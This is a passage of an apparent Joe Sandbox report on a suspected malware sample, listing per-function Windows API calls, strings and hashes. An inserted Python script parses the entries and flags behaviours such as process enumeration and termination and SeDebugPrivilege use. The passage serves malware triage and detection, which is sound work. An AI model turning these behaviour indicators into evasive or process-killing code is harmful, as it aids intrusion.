• Associated: 00000000.00000002.1696125716.000000000096E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1696180645.000000000097A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1696205917.0000000000984000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_8c0000_Certificate 11-21AIS.jbxd
Similarity
• API ID: Internet$Http$OptionQueryRequest$CloseConnectErrorHandleInfoLastOpenSend
• String ID:
• API String ID: 1241431887-3916222277
• Opcode ID: ce311b226567362ab40fe48eb03776fabc51c9d26d82b28e1a3cbee2ece714d3
• Instruction ID: 3a2f853b14d376ed4930d364abaf4b39bbfe7535c1930a5f3145bb6872f0872b
• Opcode Fuzzy Hash: ce311b226567362ab40fe48eb03776fabc51c9d26d82b28e1a3cbee2ece714d3
• Instruction Fuzzy Hash: 8D417FB5601209BFEB019F50CC89FFB77ACFF4E358F004026FA059A181D7B499849BA4
APIs
• GetModuleFileNameW.KERNEL32(?,?,00000104,?,0095DC00), ref: 0091B715
• FreeLibrary.KERNEL32(00000000,00000001,00000000,?,0095DC00), ref: 0091B749
• QueryPathOfRegTypeLib.OLEAUT32(?,?,?,?,?), ref: 0091B8C1
• SysFreeString.OLEAUT32(?), ref: 0091B8EB
Memory Dump Source
• Source File: 00000000.00000002.1696064974.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
• Associated: 00000000.00000002.1696048488.00000000008C0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1696125716.000000000094D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1696125716.000000000096E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1696180645.000000000097A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1696205917.0000000000984000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_8c0000_Certificate 11-21AIS.jbxd
Similarity
• API ID: Free$FileLibraryModuleNamePathQueryStringType
• String ID:
• API String ID: 560350794-0
• Opcode ID: f26e8dac0c6daeb7dc030ffbad0f0da10ed05745f41df6de424406c7b3065932
• Instruction ID: 7ea71265528cdfc1e317d2fc2ebe0978949d772755680b13b669e347c11cf51b
• Opcode Fuzzy Hash: f26e8dac0c6daeb7dc030ffbad0f0da10ed05745f41df6de424406c7b3065932
• Instruction Fuzzy Hash: 89F10A75A00209AFCF04DF94C894EEEB7BAFF89715F108499F915AB250DB31AE85CB50
APIs
• _memset.LIBCMT ref: 009224F5
• GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 00922688
• GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 009226AC
• GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 009226EC
• GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 0092270E
• CreateProcessW.KERNEL32(00000000,?,00000000,00000000,?,?,00000000,?,?,?), ref: 0092286F
• GetLastError.KERNEL32(00000000,00000001,00000000), ref: 009228A1
• CloseHandle.KERNEL32(?), ref: 009228D0
• CloseHandle.KERNEL32(?), ref: 00922947
Memory Dump Source
• Source File: 00000000.00000002.1696064974.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
• Associated: 00000000.00000002.1696048488.00000000008C0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1696125716.000000000094D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1696125716.000000000096E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1696180645.000000000097A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1696205917.0000000000984000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_8c0000_Certificate 11-21AIS.jbxd
Similarity
• API ID: Directory$CloseCurrentHandleSystem$CreateErrorLastProcess_memset
• String ID:
• API String ID: 4090791747-0
• Opcode ID: 67360f88420bf54610465e57c7a0e4e95f14ffb520eaa315b0e04ccc38b97fd0
• Instruction ID: d163cf0c9d076aa878a2b15dba706fcd44fb5a4ea05c71e7568911d9a2f1a0cc
• Opcode Fuzzy Hash: 67360f88420bf54610465e57c7a0e4e95f14ffb520eaa315b0e04ccc38b97fd0
• Instruction Fuzzy Hash: 33D1AD35604210AFC714EF28D891B6ABBE5FF85310F14895DF9899B3A2DB30EC44CB52
APIs
• InvalidateRect.USER32(?,00000000,00000001,?,00000001), ref: 0092B3F4
Memory Dump Source
• Source File: 00000000.00000002.1696064974.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
• Associated: 00000000.00000002.1696048488.00000000008C0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1696125716.000000000094D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1696125716.000000000096E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1696180645.000000000097A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1696205917.0000000000984000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_8c0000_Certificate 11-21AIS.jbxd
Similarity
• API ID: InvalidateRect
• String ID:
• API String ID: 634782764-0
• Opcode ID: d8485e104ab3a60df4bea5db6755572030518940ac038da452e2b09dcca47d55
• Instruction ID: ccf342021d0edbe2c0e9aaa122d280c7d81d7171f2c384172132019785308ddd
• Opcode Fuzzy Hash: d8485e104ab3a60df4bea5db6755572030518940ac038da452e2b09dcca47d55
• Instruction Fuzzy Hash: E451B134601224BBEF20AF28EC85FAD3BE8FB05314F244516F615DA2EAD775E9409B51
APIs
• LoadImageW.USER32(00000000,?,00000001,00000010,00000010,00000010), ref: 0093DB1B
• ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 0093DB3C
• LoadImageW.USER32(00000000,?,00000001,00000000,00000000,00000050), ref: 0093DB51
• ExtractIconExW.SHELL32(?,00000000,?,00000000,00000001), ref: 0093DB6E
• SendMessageW.USER32(00000000,00000080,00000000,00000000), ref: 0093DB95
• DestroyIcon.USER32(00000000,?,?,?,?,?,?,008DA67C,00000000,00000000,00000000,000000FF,00000000,000000FF,000000FF), ref: 0093DBA0
• SendMessageW.USER32(00000000,00000080,00000001,00000000), ref: 0093DBBD
• DestroyIcon.USER32(00000000,?,?,?,?,?,?,008DA67C,00000000,00000000,00000000,000000FF,00000000,000000FF,000000FF), ref: 0093DBC8
Memory Dump Source
• Source File: 00000000.00000002.1696064974.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
• Associated: 00000000.00000002.1696048488.00000000008C0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1696125716.000000000094D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1696125716.000000000096E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1696180645.000000000097A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1696205917.0000000000984000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_8c0000_Certificate 11-21AIS.jbxd
Similarity
• API ID: Icon$DestroyExtractImageLoadMessageSend
• String ID:
• API String ID: 1268354404-0
• Opcode ID: e0a54dbf758cd2fc10c5bcd023be37779f4fc2f8ee3adcee8eb52e0b91a7cb1d
• Instruction ID: 4d4f2cca9ea0e5a202e1a06a6903fd8b96de1ab4258222e7c3a56ecec890b95f
• Opcode Fuzzy Hash: e0a54dbf758cd2fc10c5bcd023be37779f4fc2f8ee3adcee8eb52e0b91a7cb1d
• Instruction Fuzzy Hash: CD518634611208EFDB24DF68DC91FAA77B8FB08314F200619F986D6290D7B0ED80DB51
APIs
  • Part of subcall function 00906EBB: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,00905FA6,?), ref: 00906ED8
  • Part of subcall function 00906EBB: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,00905FA6,?), ref: 00906EF1
  • Part of subcall function 009072CB: GetFileAttributesW.KERNEL32(?,00906019), ref: 009072CC
• lstrcmpiW.KERNEL32(?,?), ref: 009075CA
• _wcscmp.LIBCMT ref: 009075E2
• MoveFileW.KERNEL32(?,?), ref: 009075FB
Memory Dump Source
• Source File: 00000000.00000002.1696064974.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
• Associated: 00000000.00000002.1696048488.00000000008C0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1696125716.000000000094D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1696125716.000000000096E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1696180645.000000000097A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1696205917.0000000000984000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_8c0000_Certificate 11-21AIS.jbxd
Similarity
• API ID: FileFullNamePath$AttributesMove_wcscmplstrcmpi
• String ID:
• API String ID: 793581249-0
• Opcode ID: 56d124de7aed23ca9f93a64ee8f171cacfb5d2ad5d048d261fe7fda28fae91f0
• Instruction ID: 51c896d7760144842e16e06d849cce8b4ad0237afc4758a37e285305104fbd9a
• Opcode Fuzzy Hash: 56d124de7aed23ca9f93a64ee8f171cacfb5d2ad5d048d261fe7fda28fae91f0
• Instruction Fuzzy Hash: 425120B2E092195EDF60EB94DC41DDEB3BCEF49320B1044AAF605E3181EA74A6C5CF61
                                                                              APIs
                                                                              • ShowWindow.USER32(00000000,000000FF,00000000,00000000,00000000,?,0093DAD1,00000004,00000000,00000000), ref: 008DEAEB
                                                                              • ShowWindow.USER32(00000000,00000000,00000000,00000000,00000000,?,0093DAD1,00000004,00000000,00000000), ref: 008DEB32
                                                                              • ShowWindow.USER32(00000000,00000006,00000000,00000000,00000000,?,0093DAD1,00000004,00000000,00000000), ref: 0093DC86
                                                                              • ShowWindow.USER32(00000000,000000FF,00000000,00000000,00000000,?,0093DAD1,00000004,00000000,00000000), ref: 0093DCF2
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1696064974.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                                                                               • Associated: 00000000.00000002.1696048488.00000000008C0000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1696125716.000000000094D000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1696125716.000000000096E000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1696180645.000000000097A000.00000004.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1696205917.0000000000984000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8c0000_Certificate 11-21AIS.jbxd
                                                                              Similarity
                                                                              • API ID: ShowWindow
                                                                              • String ID:
                                                                              • API String ID: 1268545403-0
                                                                              • Opcode ID: 86b75f18d1c7218c3418952a344eeeee31a51e26737567e2124e18e772d2b63c
                                                                              • Instruction ID: 18bdd1e5af67c25df4e9e2785ccaeacd95c913c34b4173863a0c69c4d76d3b2a
                                                                              • Opcode Fuzzy Hash: 86b75f18d1c7218c3418952a344eeeee31a51e26737567e2124e18e772d2b63c
                                                                              • Instruction Fuzzy Hash: 1F41297422A2809AC7356B28DD9DF2A7B99FB53328F191A0FF087EA761C6707840D711
                                                                              APIs
                                                                              • GetProcessHeap.KERNEL32(00000008,0000000C,00000000,00000000,?,008FAEF1,00000B00,?,?), ref: 008FB26C
                                                                              • HeapAlloc.KERNEL32(00000000,?,008FAEF1,00000B00,?,?), ref: 008FB273
                                                                              • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,008FAEF1,00000B00,?,?), ref: 008FB288
                                                                              • GetCurrentProcess.KERNEL32(?,00000000,?,008FAEF1,00000B00,?,?), ref: 008FB290
                                                                              • DuplicateHandle.KERNEL32(00000000,?,008FAEF1,00000B00,?,?), ref: 008FB293
                                                                              • GetCurrentProcess.KERNEL32(00000008,00000000,00000000,00000002,?,008FAEF1,00000B00,?,?), ref: 008FB2A3
                                                                              • GetCurrentProcess.KERNEL32(008FAEF1,00000000,?,008FAEF1,00000B00,?,?), ref: 008FB2AB
                                                                              • DuplicateHandle.KERNEL32(00000000,?,008FAEF1,00000B00,?,?), ref: 008FB2AE
                                                                              • CreateThread.KERNEL32(00000000,00000000,008FB2D4,00000000,00000000,00000000), ref: 008FB2C8
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1696064974.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                                                                               • Associated: 00000000.00000002.1696048488.00000000008C0000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1696125716.000000000094D000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1696125716.000000000096E000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1696180645.000000000097A000.00000004.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1696205917.0000000000984000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8c0000_Certificate 11-21AIS.jbxd
                                                                              Similarity
                                                                              • API ID: Process$Current$DuplicateHandleHeap$AllocCreateThread
                                                                              • String ID:
                                                                              • API String ID: 1957940570-0
                                                                              • Opcode ID: 2cde450024a57893e6a26af7da152b82e23a382c06f88dc9e15a6af24b69d81a
                                                                              • Instruction ID: bd78c59139b5eb107dfa9635a3a0db8832d97e008739dc96e6be591bd3f61a31
                                                                              • Opcode Fuzzy Hash: 2cde450024a57893e6a26af7da152b82e23a382c06f88dc9e15a6af24b69d81a
                                                                              • Instruction Fuzzy Hash: B5011DB9255308BFE710AFA5DC4DF6B3BACEB89B04F008411FA04CB1A1CA749800DB21
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1696064974.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                                                                               • Associated: 00000000.00000002.1696048488.00000000008C0000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1696125716.000000000094D000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1696125716.000000000096E000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1696180645.000000000097A000.00000004.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1696205917.0000000000984000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8c0000_Certificate 11-21AIS.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: NULL Pointer assignment$Not an Object type
                                                                              • API String ID: 0-572801152
                                                                              • Opcode ID: 11923c80d2f627d930e964ce45fe28f397a42b52188c0fab04e2835b0de7ba02
                                                                              • Instruction ID: 6f7864cfd3d7787221d762266a62f9d04b9ad00a69eb9116529eedfabdf3c042
                                                                              • Opcode Fuzzy Hash: 11923c80d2f627d930e964ce45fe28f397a42b52188c0fab04e2835b0de7ba02
                                                                              • Instruction Fuzzy Hash: 05E192B1B4021EABDF14DFA8D881BEE77B9EB48354F148469F905A7281D770AD81CB90
                                                                              APIs
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1696064974.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                                                                               • Associated: 00000000.00000002.1696048488.00000000008C0000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1696125716.000000000094D000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1696125716.000000000096E000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1696180645.000000000097A000.00000004.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1696205917.0000000000984000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8c0000_Certificate 11-21AIS.jbxd
                                                                              Similarity
                                                                              • API ID: Variant$ClearInit$_memset
                                                                              • String ID: Incorrect Object type in FOR..IN loop$Null Object assignment in FOR..IN loop
                                                                              • API String ID: 2862541840-625585964
                                                                              • Opcode ID: ace4cdbdfee3072b94825bcdf80499b8cabaf915ac4a057263023e130cff47fe
                                                                              • Instruction ID: a0ae421154452631abd0284ffc8aa1a590d4ba7ddb6e8045f54fde4bd2d726b5
                                                                              • Opcode Fuzzy Hash: ace4cdbdfee3072b94825bcdf80499b8cabaf915ac4a057263023e130cff47fe
                                                                              • Instruction Fuzzy Hash: 3091AF75A00219EBDF24CFA5D884FEEBBB9EF85710F108559F515AB290DB709980CFA0
                                                                              APIs
                                                                              • SendMessageW.USER32(00000000,00001036,00000010,00000010), ref: 00929B19
                                                                              • SendMessageW.USER32(?,00001036,00000000,?), ref: 00929B2D
                                                                              • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 00929B47
                                                                              • _wcscat.LIBCMT ref: 00929BA2
                                                                              • SendMessageW.USER32(?,00001057,00000000,?), ref: 00929BB9
                                                                              • SendMessageW.USER32(?,00001061,?,0000000F), ref: 00929BE7
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1696064974.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                                                                               • Associated: 00000000.00000002.1696048488.00000000008C0000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1696125716.000000000094D000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1696125716.000000000096E000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1696180645.000000000097A000.00000004.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1696205917.0000000000984000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8c0000_Certificate 11-21AIS.jbxd
                                                                              Similarity
                                                                              • API ID: MessageSend$Window_wcscat
                                                                              • String ID: SysListView32
                                                                              • API String ID: 307300125-78025650
                                                                              • Opcode ID: 0d5ec75326ebbb32d697a26cd9c89f36aa97aa4e6d87b6bc733301a25f905413
                                                                              • Instruction ID: 05d37a84da57159a329df604a0c8f7dd8e93fdd27c8b3de7a7d83e75724de36c
                                                                              • Opcode Fuzzy Hash: 0d5ec75326ebbb32d697a26cd9c89f36aa97aa4e6d87b6bc733301a25f905413
                                                                              • Instruction Fuzzy Hash: CA419075A00318ABDB219FA8EC85FEE77ACEF48350F10442AF589E7291D7719D84CB60
                                                                              APIs
                                                                                • Part of subcall function 00906532: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,00000000), ref: 00906554
                                                                                • Part of subcall function 00906532: Process32FirstW.KERNEL32(00000000,0000022C), ref: 00906564
                                                                                • Part of subcall function 00906532: CloseHandle.KERNEL32(00000000,?,00000000), ref: 009065F9
                                                                              • OpenProcess.KERNEL32(00000001,00000000,?), ref: 0092179A
                                                                              • GetLastError.KERNEL32 ref: 009217AD
                                                                              • OpenProcess.KERNEL32(00000001,00000000,?), ref: 009217D9
                                                                              • TerminateProcess.KERNEL32(00000000,00000000), ref: 00921855
                                                                              • GetLastError.KERNEL32(00000000), ref: 00921860
                                                                              • CloseHandle.KERNEL32(00000000), ref: 00921895
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1696064974.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                                                                               • Associated: 00000000.00000002.1696048488.00000000008C0000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1696125716.000000000094D000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1696125716.000000000096E000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1696180645.000000000097A000.00000004.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1696205917.0000000000984000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8c0000_Certificate 11-21AIS.jbxd
                                                                              Similarity
                                                                              • API ID: Process$CloseErrorHandleLastOpen$CreateFirstProcess32SnapshotTerminateToolhelp32
                                                                              • String ID: SeDebugPrivilege
                                                                              • API String ID: 2533919879-2896544425
                                                                              • Opcode ID: 60b0b75867d18ba4c302fa75da9110b57d958f1a01cd20da2db8adb2a22fbd11
                                                                              • Instruction ID: cb450c89057f32d3fae3ba5c9d5605b471b597b7f11b29e37f655ebb97ba24cf
                                                                              • Opcode Fuzzy Hash: 60b0b75867d18ba4c302fa75da9110b57d958f1a01cd20da2db8adb2a22fbd11
                                                                              • Instruction Fuzzy Hash: C241BE75600211AFDB05EF68D8D5F6EB7A5BF64310F048459FA069F3C2DB75A900CB92
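Read together, the entry above is the one a triager would pull out of this listing first: process enumeration via CreateToolhelp32Snapshot/Process32FirstW (reached through a subcall), then OpenProcess, TerminateProcess and CloseHandle, with the string SeDebugPrivilege attached. A report like this carries hundreds of such entries, most of them runtime code, so the practical task is to turn the layout into a table and let a few rules pick out the entries worth opening in the disassembler. The Python below is an added example, not part of the Joe Sandbox report or of the sample: it parses entries in this page's "APIs / Strings / Similarity" layout from a constructed excerpt of the lines shown above, records each API together with whether it was listed as "Part of subcall function", splits the `$`-joined String ID, and applies a small hand-written rule set (the rule labels and API groupings are my assumptions, not Joe Sandbox signatures) to produce a triage table keyed by the entry's Instruction Fuzzy Hash.

```python
import re
from dataclasses import dataclass, field

# One API bullet of a Joe Sandbox function entry, in the three shapes seen on the page:
#   • OpenProcess.KERNEL32(00000001,00000000,?), ref: 0092179A
#   • _wcscmp.LIBCMT ref: 009075E2
#   • Part of subcall function 00906532: Process32FirstW.KERNEL32(00000000,0000022C), ref: 00906564
API_RE = re.compile(
    r"^\s*•\s*(?:Part of subcall function (?P<caller>[0-9A-F]+):\s*)?"
    r"(?P<api>\w+)\.(?P<module>[A-Za-z0-9_]+)"
    r"(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-F]+)\s*$"
)

# Constructed excerpt: three entries abridged from the page, same bullets and headings.
SAMPLE = """\
APIs
  • Part of subcall function 00906532: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,00000000), ref: 00906554
  • Part of subcall function 00906532: Process32FirstW.KERNEL32(00000000,0000022C), ref: 00906564
• OpenProcess.KERNEL32(00000001,00000000,?), ref: 0092179A
• TerminateProcess.KERNEL32(00000000,00000000), ref: 00921855
• CloseHandle.KERNEL32(00000000), ref: 00921895
Strings
Memory Dump Source
• Source File: 00000000.00000002.1696064974.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
Similarity
• API ID: Process$CloseErrorHandleLastOpen$CreateFirstProcess32SnapshotTerminateToolhelp32
• String ID: SeDebugPrivilege
• API String ID: 2533919879-2896544425
• Instruction Fuzzy Hash: C241BE75600211AFDB05EF68D8D5F6EB7A5BF64310F048459FA069F3C2DB75A900CB92
APIs
• GetProcessHeap.KERNEL32(00000008,0000000C,00000000,00000000,?,008FAEF1,00000B00,?,?), ref: 008FB26C
• DuplicateHandle.KERNEL32(00000000,?,008FAEF1,00000B00,?,?), ref: 008FB293
• CreateThread.KERNEL32(00000000,00000000,008FB2D4,00000000,00000000,00000000), ref: 008FB2C8
Similarity
• API ID: Process$Current$DuplicateHandleHeap$AllocCreateThread
• String ID:
• Instruction Fuzzy Hash: B5011DB9255308BFE710AFA5DC4DF6B3BACEB89B04F008411FA04CB1A1CA749800DB21
APIs
• LoadIconW.USER32(00000000,00007F03), ref: 009058B8
Similarity
• API ID: IconLoad
• String ID: blank$info$question$stop$warning
• Instruction Fuzzy Hash: CD113A3670D746BFE7005B559C82DAB23ACEF56324B20803AFD00E62C1FBB4EA405A65
"""


@dataclass
class FunctionEntry:
    """One 'APIs ... Instruction Fuzzy Hash' block of the report."""
    apis: list = field(default_factory=list)     # (api, module, ref, via_subcall)
    strings: list = field(default_factory=list)  # String ID split on '$'
    fuzzy_hash: str = ""

    def api_names(self, include_subcalls=True):
        return {api for api, _, _, sub in self.apis if include_subcalls or not sub}


def parse_entries(text):
    """Split report text into entries; the Instruction Fuzzy Hash line closes one."""
    entries, cur = [], FunctionEntry()
    for line in text.splitlines():
        m = API_RE.match(line)
        if m:
            cur.apis.append((m["api"], m["module"], m["ref"], m["caller"] is not None))
            continue
        s = line.strip()
        if s.startswith("• String ID:"):
            cur.strings = [x for x in s.split(":", 1)[1].strip().split("$") if x]
        elif s.startswith("• Instruction Fuzzy Hash:"):
            cur.fuzzy_hash = s.split(":", 1)[1].strip()
            entries.append(cur)
            cur = FunctionEntry()
    return entries


# Hand-written triage rules (assumption: mine, not Joe Sandbox signatures). A rule fires
# when every listed API is present in the entry, or when its string is in the String ID.
RULES = [
    ("process-enumeration", {"CreateToolhelp32Snapshot", "Process32FirstW"}, None),
    ("process-termination", {"OpenProcess", "TerminateProcess"}, None),
    ("debug-privilege-string", set(), "SeDebugPrivilege"),
    ("handle-dup-plus-thread", {"DuplicateHandle", "CreateThread"}, None),
]


def triage(entry, include_subcalls=True):
    names = entry.api_names(include_subcalls)
    hits = []
    for label, apis, needle in RULES:
        if apis and apis <= names:
            hits.append(label)
        elif needle is not None and needle in entry.strings:
            hits.append(label)
    return hits


def report(text, include_subcalls=True):
    """(fuzzy-hash prefix, hit labels) for every entry that triggered at least one rule."""
    out = []
    for e in parse_entries(text):
        hits = triage(e, include_subcalls)
        if hits:
            out.append((e.fuzzy_hash[:16], hits))
    return out


if __name__ == "__main__":
    for prefix, hits in report(SAMPLE):
        print(prefix, ", ".join(hits))
```

Two caveats that follow from the layout itself. APIs listed as "Part of subcall function" are reachable from the entry, not called by it directly, which is why the parser keeps the flag and `triage(entry, include_subcalls=False)` lets a rule ignore them. And the fuzzy hashes are per function, so a match against another report means similar code, which for a binary the report flags as compiled AutoIt is most often the interpreter runtime (the FOR..IN and NULL-pointer error strings in the neighbouring entries are consistent with that) rather than the logic that was injected.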
                                                                              APIs
                                                                              • LoadIconW.USER32(00000000,00007F03), ref: 009058B8
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1696064974.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                                                                               • Associated: 00000000.00000002.1696048488.00000000008C0000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1696125716.000000000094D000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1696125716.000000000096E000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1696180645.000000000097A000.00000004.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1696205917.0000000000984000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8c0000_Certificate 11-21AIS.jbxd
                                                                              Similarity
                                                                              • API ID: IconLoad
                                                                              • String ID: blank$info$question$stop$warning
                                                                              • API String ID: 2457776203-404129466
                                                                              • Opcode ID: dfba8a3a382be6acf5394c29ddcef0121143fb79ba17e91f4fe59c7edd11c1a3
                                                                              • Instruction ID: 6572e3cf12ae935e8111a49ba0ac51cceaf7f186cfe22ecf179d0319c44c706a
                                                                              • Opcode Fuzzy Hash: dfba8a3a382be6acf5394c29ddcef0121143fb79ba17e91f4fe59c7edd11c1a3
                                                                              • Instruction Fuzzy Hash: CD113A3670D746BFE7005B559C82DAB23ACEF56324B20803AFD00E62C1FBB4EA405A65
                                                                              APIs
                                                                              • SafeArrayGetVartype.OLEAUT32(?,00000000), ref: 0090A806
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1696064974.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                                                                               • Associated: 00000000.00000002.1696048488.00000000008C0000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1696125716.000000000094D000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1696125716.000000000096E000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1696180645.000000000097A000.00000004.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1696205917.0000000000984000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8c0000_Certificate 11-21AIS.jbxd
                                                                              Similarity
                                                                              • API ID: ArraySafeVartype
                                                                              • String ID:
                                                                              • API String ID: 1725837607-0
                                                                              • Opcode ID: 5507c81c9f6485f2ca6a14671207e5cc573506cc8e7a5dd29feda8dba2e8d80c
                                                                              • Instruction ID: cdb341556f68b7033dfb8bf9e63e25d946610fe675255d136b231ae7c73f5b6b
                                                                              • Opcode Fuzzy Hash: 5507c81c9f6485f2ca6a14671207e5cc573506cc8e7a5dd29feda8dba2e8d80c
